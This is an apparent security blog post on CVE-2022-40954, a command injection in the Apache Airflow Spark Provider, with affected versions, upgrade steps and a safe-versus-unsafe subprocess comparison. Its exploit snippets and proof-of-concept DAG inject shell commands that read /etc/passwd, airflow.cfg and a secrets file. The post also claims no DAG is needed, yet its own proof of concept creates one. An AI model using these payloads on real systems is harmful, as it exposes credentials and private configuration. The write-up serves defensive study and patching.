In November 2022, a critical security vulnerability was disclosed in the Apache Airflow Spark Provider (CVE-2022-40954). It may not look dramatic at first, but in practice it gives an attacker an easy path to read any file the worker can access from the task execution context, without needing write access to DAG files. This post breaks down the bug, details how the exploit works, and shows you how to fix or avoid the issue.
Affected Versions
- Apache Airflow Spark Provider versions before 4.0.1.
- Apache Airflow itself, prior to version 2.3.0, if the Spark Provider is installed (regardless of Spark Provider version).
- Note: Spark Provider 4.0.1 only works with Airflow 2.3.0 and up, so you need to upgrade both to fully remove the issue.
Vulnerability Details
The problem is an OS command injection: input supplied by a user (for example, via the task context) is not sanitized before being used in an operating system command, typically one built and executed through a Python subprocess or similar mechanism. The vulnerability is classified as CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection').
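To see why this class of bug is dangerous, here is a minimal, hypothetical sketch of the pattern (illustrative only, not the provider's actual code): the same user-controlled value, first interpolated into a shell string and then passed as a plain argument list.

```python
import subprocess

def run_job_unsafe(user_arg: str) -> None:
    # Vulnerable pattern: user input is interpolated into a shell string, so
    # metacharacters like ';', '|' and backticks are interpreted by the shell.
    subprocess.run(f"spark-submit --master yarn {user_arg}", shell=True)

def run_job_safer(user_arg: str) -> None:
    # Safer pattern: pass an argument list and skip the shell entirely; the
    # value reaches spark-submit as a single argv element, never as shell syntax.
    subprocess.run(["spark-submit", "--master", "yarn", user_arg])

# With user_arg = "app.py; cat /etc/passwd", the unsafe variant runs two separate
# commands, while the safer one passes the whole string as one literal argument.
```

The provider's internals differ, but the underlying issue is the same: untrusted parameters reach a command line without being neutralized.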
The Real-World Impact
Attackers can exploit this to read any file the Airflow worker can access, without needing to upload malicious code or create a new DAG. This is a big deal for environments where users are allowed to trigger tasks, but should not be able to read sensitive config files, environment files, credentials, or any private data on the worker.
How the Exploit Works
The Apache Airflow Spark Provider allows end users to supply parameters for running Spark jobs. Unfortunately, before version 4.0.1, these parameters were not sufficiently filtered or escaped, so shell metacharacters in user input (semicolons, pipes, backticks) could break out of the intended command and run arbitrary shell commands.
For instance, consider a Spark job submission whose parameter fields are exploited like this:
```python
from airflow.providers.apache.spark.operators.spark_submit import SparkSubmitOperator

malicious_param = '--master yarn; cat /etc/passwd'  # The injected command

task = SparkSubmitOperator(
    application='my_spark_app.py',
    task_id='spark-test',
    conn_id='spark_default',
    application_args=[malicious_param],  # User-supplied param
    dag=dag,
)
```
When Airflow builds the final shell command, it does not properly escape the application_args, so the shell ends up processing:
```bash
spark-submit --master yarn; cat /etc/passwd
```
This actually creates two separate commands:

1. spark-submit --master yarn
2. cat /etc/passwd ← The attack command
The output of the cat command might then get saved to logs, job artifacts, or other places where the attacker can view it.
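If you want to see this splitting for yourself without a Spark installation, a harmless stand-in (purely illustrative, not the provider's code) behaves the same way:

```python
import subprocess

# Simulate the vulnerable construction, with `echo` standing in for spark-submit.
injected = "--master yarn; echo 'this ran as a second command'"
result = subprocess.run(f"echo spark-submit {injected}",
                        shell=True, capture_output=True, text=True)
print(result.stdout)
# Prints two lines, showing that two commands were executed:
#   spark-submit --master yarn
#   this ran as a second command
```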
Reading Any File
By changing the injected command, attackers can read (or even try to exfiltrate) data from any file accessible to the Airflow process:
```python
application_args=['--master yarn; cat /etc/airflow/airflow.cfg']  # Reads Airflow config
```
Or redirect the result to a location the attacker controls:
```python
application_args=['--master yarn; cat /etc/airflow/secrets.env > /tmp/leak.txt']
```
Proof of Concept
Below is a minimal PoC (proof of concept) that abuses the vulnerable Spark Provider. (For demonstration only—do not run this in production!)
```python
from airflow.models import DAG
from airflow.providers.apache.spark.operators.spark_submit import SparkSubmitOperator
from datetime import datetime

dag = DAG(
    dag_id='exploit_cve_2022_40954',
    start_date=datetime(2023, 1, 1),
    schedule_interval=None,
)

# Attack: read the 'airflow.cfg' file into the task logs
exploit_arg = '--master local; cat /etc/airflow/airflow.cfg'

task = SparkSubmitOperator(
    application='/path/to/your/app.py',
    task_id='exploit_task',
    application_args=[exploit_arg],
    dag=dag,
)
```
When this DAG is run, the file /etc/airflow/airflow.cfg will be printed into the task logs!
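If you want to try this in a disposable test environment (never in production), you could run the task once from the CLI and inspect the output directly; the DAG and task IDs below come from the PoC above, and a working spark_default connection is assumed:

```bash
# Execute the task in a local test context; the injected command's output
# shows up in the task log printed to the terminal.
airflow tasks test exploit_cve_2022_40954 exploit_task 2023-01-01
```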
How to Fix
Upgrade the Spark Provider:
Install Spark Provider 4.0.1 or later in your Airflow environment; note that it can only be installed on Airflow 2.3.0 or later:
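Assuming a standard pip-based installation, the check and upgrade look roughly like this:

```bash
# Check which Spark provider version is currently installed
pip show apache-airflow-providers-apache-spark

# Upgrade the provider to a fixed release (requires Airflow 2.3.0+)
pip install "apache-airflow-providers-apache-spark>=4.0.1"
```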
Upgrade Airflow:
If your Airflow version is lower than 2.3.0, you must first upgrade Airflow (2.3.4 or the latest stable release is recommended), then upgrade the provider as above.
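As a sketch, assuming a pip-based install on Python 3.8 (adjust the Airflow and Python versions to your environment), the upgrade follows the constraints-file approach from the official Airflow installation docs:

```bash
# Upgrade Airflow itself, pinned against the official constraints file
pip install "apache-airflow==2.3.4" \
  --constraint "https://raw.githubusercontent.com/apache/airflow/constraints-2.3.4/constraints-3.8.txt"
```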
References
- CVE-2022-40954 on NIST NVD
- Apache Airflow Security Advisory
- Apache Airflow Spark Provider Release Notes
- Original Disclosure
Conclusion
CVE-2022-40954 is a critical vulnerability that allows attackers to read arbitrary files on an Airflow worker if the Apache Spark Provider is out of date. Protect your data—upgrade both Airflow and the Spark Provider component as soon as you can.
Still using older versions? Anyone with access to execute tasks in your system may already have access to sensitive files.
> *Stay safe—keep your Airflow and providers updated. If you found this guide helpful, share it with your fellow engineers and admins!*
*(This post is original content and offers a simplified, hands-on view for security learners, sysadmins, and DevOps practitioners.)*
Timeline
Published on: 11/22/2022 10:15:00 UTC
Last modified on: 11/28/2022 17:51:00 UTC